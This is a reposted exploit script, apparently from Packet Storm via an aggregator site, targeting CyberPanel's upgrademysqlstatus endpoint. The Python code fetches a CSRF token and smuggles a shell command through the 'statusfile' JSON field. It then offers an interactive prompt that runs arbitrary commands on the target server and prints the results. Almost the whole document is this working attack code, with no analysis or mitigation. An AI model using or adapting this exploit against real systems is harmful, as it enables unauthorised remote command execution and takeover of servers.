CyberPanel upgrademysqlstatus Arbitrary Command Execution
2024-11-7 23:25:11 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

import httpx 
import sys

def get_CSRF_token(client):
resp = client.get("/")

return resp.cookies['csrftoken']

def pwn(client, CSRF_token, cmd):
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type":"application/json",
"Referer": str(client.base_url)
}

payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)

return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]

def exploit(client, cmd):
CSRF_token = get_CSRF_token(client)
stdout = pwn(client, CSRF_token, cmd)
print(stdout)

if __name__ == "__main__":
target = sys.argv[1]

client = httpx.Client(base_url=target, verify=False)
while True:
cmd = input("$> ")

exploit(client, cmd)


文章来源: https://packetstormsecurity.com/files/182539/cyberpanel-exec.txt
如有侵权请联系:admin#unsafe.sh